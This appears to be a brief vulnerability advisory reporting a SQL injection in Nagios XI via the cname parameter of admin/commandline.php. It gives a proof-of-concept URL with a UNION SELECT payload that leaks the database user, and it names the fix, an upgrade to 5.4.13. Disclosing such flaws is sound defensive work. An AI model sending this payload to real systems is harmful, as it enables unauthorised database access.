EPSS
Percentile
91.8%
A SQL injection issue was discovered in Nagios XI via the admin/commandline.php cname parameter.
http://xxx/nagiosql/admin/commandline.php?cname='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23
Upgrade to version 5.4.13